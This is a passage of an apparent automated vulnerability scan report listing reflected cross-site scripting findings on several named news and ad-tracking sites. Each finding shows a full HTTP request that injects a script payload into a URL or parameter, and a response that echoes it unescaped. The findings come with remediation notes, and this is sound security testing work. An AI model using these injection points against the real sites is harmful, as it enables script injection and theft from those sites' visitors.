User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:05 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30481
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:10 GMT
Date: Sat, 17 Sep 2011 16:36:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
rop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesise6a72</script><script>alert(1)</script>beb069e8af1/style.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO
...[SNIP]...
4.189. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe99d</script><script>alert(1)</script>0cc81665bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/style.cssfe99d</script><script>alert(1)</script>0cc81665bd?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:38 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30480
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:41 GMT
Date: Sat, 17 Sep 2011 16:37:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/style.cssfe99d</script><script>alert(1)</script>0cc81665bd?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER
...[SNIP]...
4.190. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef724</script><script>alert(1)</script>5e2bcbf479a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-includesef724</script><script>alert(1)</script>5e2bcbf479a/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:32:57 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30474
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:01 GMT
Date: Sat, 17 Sep 2011 16:33:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
= '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-includesef724</script><script>alert(1)</script>5e2bcbf479a/js/jquery/jquery.js?ver=1.4.2';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/***********
...[SNIP]...
4.191. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b8e6</script><script>alert(1)</script>65bec361f4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-includes/js7b8e6</script><script>alert(1)</script>65bec361f4a/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:28 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30474
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:32 GMT
Date: Sat, 17 Sep 2011 16:34:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-includes/js7b8e6</script><script>alert(1)</script>65bec361f4a/jquery/jquery.js?ver=1.4.2';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/*************
...[SNIP]...
4.192. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b22c</script><script>alert(1)</script>3ad956e47d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-includes/js/jquery7b22c</script><script>alert(1)</script>3ad956e47d7/jquery.js?ver=1.4.2 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:35:53 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30474
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:35:56 GMT
Date: Sat, 17 Sep 2011 16:35:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-includes/js/jquery7b22c</script><script>alert(1)</script>3ad956e47d7/jquery.js?ver=1.4.2';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT
...[SNIP]...
4.193. http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d391</script><script>alert(1)</script>27f192055e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-includes/js/jquery/jquery.js5d391</script><script>alert(1)</script>27f192055e?ver=1.4.2 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:18 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30473
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:21 GMT
Date: Sat, 17 Sep 2011 16:37:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-includes/js/jquery/jquery.js5d391</script><script>alert(1)</script>27f192055e?ver=1.4.2';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYT
...[SNIP]...
4.194. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload c5e56<script>alert(1)</script>ce2a154d05e was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.misquincemag.com%2F&uid=goT0SKb9csQQCWy8_378374c5e56<script>alert(1)</script>ce2a154d05e&xy=0%2C0&wh=728%2C90&vchannel=90120&cid=196462&iad=1316294811596-40833402285352350&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B310EB9052C2A79AF8123772C51C1F07; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sat, 17 Sep 2011 16:39:40 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("goT0SKb9csQQCWy8_378374c5e56<script>alert(1)</script>ce2a154d05e");
4.195. http://events.seattlepi.com/partner_json/search [image_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.seattlepi.com
Path:   /partner_json/search

Issue detail

The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload 8cd1e<script>alert(1)</script>b1752722c02 was submitted in the image_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&ssrss=0&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb8cd1e<script>alert(1)</script>b1752722c02&cat=8%2C10&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294685820-New%7C1318886685820%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.1.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:27:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 65
ETag: "c67a6f3fd7c5e670dca1d1b04e06101d"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: d7592b306310903f249104b320b19129604d9725
Z-REQUEST-HANDLED-BY: www23
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2504

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Michael Jackson THE IMMORTAL World Tour by Cirque du Soleil","venue_id":9279,"id":151948185,"images":[{"url":"http://www.zvents.com/images/internal/9/8/9/0/img_150989_thumb8cd1e<script>alert(1)</script>b1752722c02.jpg?resample_method=cropped","height":300,"width":400}],"starttime":"Wed Nov 09 20:00:00 UTC 2011","zurl":"/seattle-wa/events/show/151948185-michael-jackson-the-immortal-world-tour-by-cirque-du-soleil
...[SNIP]...
4.196. http://events.seattlepi.com/partner_json/search [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.seattlepi.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 9bf95<script>alert(1)</script>49fbf1e28cc was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&ssrss=0&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&cat=8%2C10&rand_spn=5&st=event&jsonsp=jsp_09bf95<script>alert(1)</script>49fbf1e28cc HTTP/1.1
Host: events.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294685820-New%7C1318886685820%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.1.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:27:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 160
ETag: "11474c2ff64583fb593f14d397eb9c31"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 67d5f3bd490bd1b411fa055aaf81d780be3a78ac
Z-REQUEST-HANDLED-BY: www17
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2381

jsp_09bf95<script>alert(1)</script>49fbf1e28cc('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Michael Jackson THE IMMORTAL World Tour by Cirque du Soleil","venue_id":9279,"id":151948185,"images":[{"url":"http://www.zvents.com/images
...[SNIP]...
4.197. http://events.seattlepi.com/partner_json/search [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.seattlepi.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload ccd58<script>alert(1)</script>afd8a58597 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&ssrss=0&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&cat=8%2C10&rand_spn=5&st=eventccd58<script>alert(1)</script>afd8a58597&jsonsp=jsp_0 HTTP/1.1
Host: events.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1316294685820-New%7C1318886685820%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.1.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:27:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 10
ETag: "06aa9b23137fedad3f0346d6ad7b048f"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: bc3031bbc26db79f807ee3d10c84323ae07cab47
Z-REQUEST-HANDLED-BY: www19
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 130

{"rsp":{"status":"failed","msg":"Invalid search: eventccd58<script>alert(1)</script>afd8a58597 is not a valid search category."}}
4.198. http://events.stamfordadvocate.com/partner_json/search [image_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.stamfordadvocate.com
Path:   /partner_json/search

Issue detail

The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload 73700<script>alert(1)</script>e2cdf18e5cc was submitted in the image_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=3&advq=true&sponsored=true&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb73700<script>alert(1)</script>e2cdf18e5cc&rand_spn=15&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182.1316294656.1316294656.1316294656.1; __utmb=81258325.1.10.1316294656; __utmc=81258325; __utmz=81258325.1316294656.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/the-advocate.php

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:30 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 128
ETag: "391c8ab5e55cd95b03cb47116b90070f"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 6a065ecdfbb4323f32958ff9481cd4616cf435fe
Z-REQUEST-HANDLED-BY: www12
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 3240

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stamford Hospital Dream Ball","venue_id":1155227,"id":179273805,"images":[],"starttime":"Sat Nov 05 18:00:00 UTC 2011","zurl":"/stamford-ct/events/show/179273805-stamford-hospital-dream-ball"},{"name":"Joan Rivers","venue_id":991803,"id":180275306,"images":[{"url":"http://www.zvents.com/images/internal/5/8/6/4/img_9964685_thumb73700<script>alert(1)</script>e2cdf18e5cc.jpg?resample_method=resized","height":null,"width":null}],"starttime":"Fri Nov 11 20:00:00 UTC 2011","zurl":"/stamford-ct/events/show/180275306-joan-rivers"},{"name":"Joan Baez","venue_id":991803,"id"
...[SNIP]...
4.199. http://events.stamfordadvocate.com/partner_json/search [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.stamfordadvocate.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 45b5d<script>alert(1)</script>71aa5d744e4 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=3&advq=true&sponsored=true&srss=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&rand_spn=15&st=event&jsonsp=jsp_045b5d<script>alert(1)</script>71aa5d744e4 HTTP/1.1
Host: events.stamfordadvocate.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1316294655808; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=81258325.768035182.1316294656.1316294656.1316294656.1; __utmb=81258325.1.10.1316294656; __utmc=81258325; __utmz=81258325.1316294656.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/the-advocate.php

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:41 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 76
ETag: "938bd31075b7bf46c44be4c01474c337"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: c67e7c296141eccb30cddd0e080711e660f3e23f
Z-REQUEST-HANDLED-BY: www21
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2871

jsp_045b5d<script>alert(1)</script>71aa5d744e4('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Stamford Hospital Dream Ball","venue_id":1155227,"id":179273805,"images":[],"starttime":"Sat Nov 05 18:00:00 UTC 2011","zurl":"/stamford-c
...[SNIP]...
4.200. http://events.stamfordadvocate.com/partner_json/search [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.stamfordadvocate.com
